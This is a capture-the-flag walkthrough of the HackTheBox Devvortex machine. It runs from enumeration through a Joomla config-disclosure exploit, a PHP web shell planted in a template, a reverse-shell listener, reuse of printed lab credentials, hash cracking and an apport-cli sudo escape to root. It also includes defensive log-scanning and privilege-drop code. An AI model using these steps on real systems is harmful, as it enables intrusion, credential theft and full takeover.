HackTheBox | Devvortex

In this walkthrough, I demonstrate how I obtained complete ownership of Devvortex on HackTheBox.
In: HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.94SVN scan initiated Mon Feb 26 12:46:59 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt
Nmap scan report for
Host is up (0.013s latency).
Not shown: 65120 closed tcp ports (reset), 413 filtered tcp ports (no-response)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
1   13.11 ms
2   13.17 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 26 12:47:31 2024 -- 1 IP address (1 host up) scanned in 31.88 seconds

Note the redirect to http://devvortex.htb in the tcp/80 output. Let's add that to our /etc/hosts file.

echo '       devvortex.htb' | sudo tee -a /etc/hosts

Service Enumeration


Gobuster Enumeration

Directory and File Enumeration

gobuster dir -u http://devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -o gobuster-80.txt -t 100

Nothing too interesting in the file and directory enumeration. Let's check for any additional server names.

Virtual Host Enumeration

gobuster vhost --domain devvortex.htb --append-domain -u -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 20 -o vhost.txt --exclude-length 166

Let's add this server name to our /etc/hosts file as well.

echo '        dev.devvortex.htb' | sudo tee -a /etc/hosts



# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/


Joomla! CMS™

1- Overview
	* This is a Joomla! 4.x installation/upgrade package.
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/4.2-dev


Enumerating Joomla

Attacking and Enumerating Joomla | HackerTarget.com
Discover the tips and techniques used to attack and break into Joomla based websites. Improve security by understanding these hacker techniques.



Running searchsploit joomla 4.2.6, we can see that there is an unauthenticated information disclosure vulnerability we can try.

Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py

Looking over the source code, we can see that it's actually a Ruby script (despite the .py file name in the searchsploit listing) and that it's quite simple in nature.

It simply makes an HTTP GET request to http://domain.tld/api/index.php/v1/config/application?public=true; the problem is that the supposedly public data returned by the API contains sensitive information.

def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url) # the unauthenticated request whose response contains the site configuration
end

We can perform this exploit manually using curl and jq to parse the data.

sudo apt install -y jq
curl -s 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true' | jq > joomla.json
jq --color-output < joomla.json | less -R
Potential username and password combination
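From the defender's side, the request above leaves a clear trace in the web server's access log. As an added example (my own code, not part of the original walkthrough), the Python below scans nginx combined-format log lines for web-services API requests carrying public=true, separating successful hits on the config endpoint (HTTP 200, a real leak) from blocked probes; the log lines, IPs and user agents are constructed for the example.

```python
import re
from typing import NamedTuple, Optional

# Constructed nginx access-log lines (combined format) for this example;
# the IPs, timestamps and user agents are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [26/Feb/2024:12:50:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1893 "-" "curl/7.88.1"
10.10.14.5 - - [26/Feb/2024:12:50:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1893 "-" "Ruby"
192.168.1.20 - - [26/Feb/2024:12:51:10 +0000] "GET /index.php HTTP/1.1" 200 8342 "-" "Mozilla/5.0"
10.10.14.9 - - [26/Feb/2024:12:52:44 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 403 512 "-" "python-requests/2.31"
10.10.14.9 - - [26/Feb/2024:12:52:45 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 512 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# The endpoint from the walkthrough leaks the site configuration; any
# web-services API request carrying public=true is worth a look.
API_PREFIX = "/api/index.php/v1/"
CONFIG_PATH = API_PREFIX + "config/application"


class Finding(NamedTuple):
    ip: str
    target: str
    status: int
    severity: str  # "leak" when the config request succeeded, else "probe"


def classify(target: str, status: int) -> Optional[str]:
    path, _, query = target.partition("?")
    if not path.startswith(API_PREFIX) or "public=true" not in query.split("&"):
        return None
    if path.startswith(CONFIG_PATH) and status == 200:
        return "leak"
    return "probe"


def scan_access_log(text: str) -> list:
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:  # skip lines that are not in combined log format
            continue
        severity = classify(m["target"], int(m["status"]))
        if severity:
            findings.append(Finding(m["ip"], m["target"], int(m["status"]), severity))
    return findings
```

Running scan_access_log(SAMPLE_LOG) reports two leaks from 10.10.14.5 and two blocked probes from 10.10.14.9; pointing it at a real access log is a quick way to tell whether the endpoint was ever read successfully before it was blocked or patched.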


Joomla Administrator

The Joomla version on the target server is vulnerable to information disclosure and leaks a username and password combination we can use to log into the Administrator dashboard.

Web Shell to Reverse Shell

Click on 'System'
Click on 'Site Templates'
Click the active template
Click on 'offline.php'
wwwolf-php-webshell/webshell.php at master · WhiteWinterWolf/wwwolf-php-webshell
WhiteWinterWolf’s PHP web shell. Contribute to WhiteWinterWolf/wwwolf-php-webshell development by creating an account on GitHub.

Borrow the PHP web shell code from here and overwrite 'offline.php'

Click Save
We can now run commands and upload files through our web shell.
We can see 'nc' is installed on the target
sudo rlwrap nc -lnvp 443

Start a TCP listener on port 443

export TERM=linux
python3 -c "import pty; pty.spawn('/bin/bash')"

Run these to have a better experience in the reverse shell

Post-Exploit Enumeration

Operating Environment

OS & Kernel

VERSION="20.04.6 LTS (Focal Fossa)"
PRETTY_NAME="Ubuntu 20.04.6 LTS"

Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on devvortex.    

Users and Groups

Local Users


Local Groups


Network Configurations

Network Interfaces

eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:ad:43 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:ad43/64 scope global dynamic mngtmpaddr 
       valid_lft 86392sec preferred_lft 14392sec
    inet6 fe80::250:56ff:feb9:ad43/64 scope link 
       valid_lft forever preferred_lft forever    

Open Ports

tcp        0      0*               LISTEN      -                   
tcp        0      0 *               LISTEN      -                   
tcp        0      0*               LISTEN      -    

Privilege Escalation

Lateral to Logan

The password that was revealed in the unauthenticated information disclosure was used to log us into the Joomla administrator dashboard. However, it is also used as the MySQL service password.

mysql -u 'lewis' -p'P4ntherg0t1n5r3c0n##'
show databases;
use joomla;
show tables;
select * from sd4fg_users;
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash
john --wordlist=~/Pentest/WordLists/rockyou.txt hash
ssh logan@devvortex.htb
From here, we repeat the post-exploit enumeration steps.

Escalate to Root

We have sudo privileges on /usr/bin/apport-cli
sudo apport-cli 2.20.11 local privilege escalation - Google Search
The version of apport-cli on the target is affected by this CVE.
fix: Do not run sensible-pager as root if using sudo/pkexec · canonical/apport@e5f78cc
The apport-cli supports view a crash. These features invoke the default pager, which is likely to be less, other functions may apply. It can be used to break out from restricted environments by sp…

Reference the GitHub commit linked from the CVE details.

man apport-cli

We should be able to generate a crash report manually using the -f and --save options.

sudo /usr/bin/apport-cli -f --save pwn.crash
I just chose option 5
sudo /usr/bin/apport-cli -c pwn.crash
Choose option 'V'
You're viewing the report in 'less', so '!' can be used to run a system command.
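The commit referenced above closes this hole by not running the pager as root when the tool was started via sudo or pkexec. As an added illustration of that principle (my own code, not apport's), the Python below plans the pager launch from the SUDO_UID/SUDO_GID variables sudo sets, drops to the invoking user before exec, and sets LESSSECURE=1 so less refuses the '!' shell escape even if the drop is not possible; view_report and its environment handling are assumptions for the example.

```python
import os
import shutil
import subprocess


def pager_launch_plan(env, euid):
    """Decide how a pager should be started by a tool that may be running
    under sudo.

    Returns (uid, gid, pager_env). If we are root only because sudo
    elevated us (SUDO_UID/SUDO_GID present), the pager should run as the
    invoking user; otherwise uid and gid are None. LESSSECURE=1 is set in
    every case so that less refuses '!' shell commands, pipes and writes.
    """
    pager_env = dict(env)
    pager_env["LESSSECURE"] = "1"
    if euid == 0 and "SUDO_UID" in env and "SUDO_GID" in env:
        return int(env["SUDO_UID"]), int(env["SUDO_GID"]), pager_env
    return None, None, pager_env


def _drop_to(uid, gid):
    # Runs in the child between fork and exec. Order matters: supplementary
    # groups and gid first, uid last, since after setuid we can no longer setgid.
    os.setgroups([])
    os.setgid(gid)
    os.setuid(uid)


def view_report(path, env=None):
    """Show a report (e.g. a .crash file) in the pager without giving the
    pager root. Assumed helper for this example, not apport's own function."""
    env = dict(os.environ if env is None else env)
    uid, gid, pager_env = pager_launch_plan(env, os.geteuid())
    pager = shutil.which(env.get("PAGER", "less")) or "cat"
    kwargs = {"env": pager_env}
    if uid is not None:
        kwargs["preexec_fn"] = lambda: _drop_to(uid, gid)
    return subprocess.call([pager, path], **kwargs)
```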
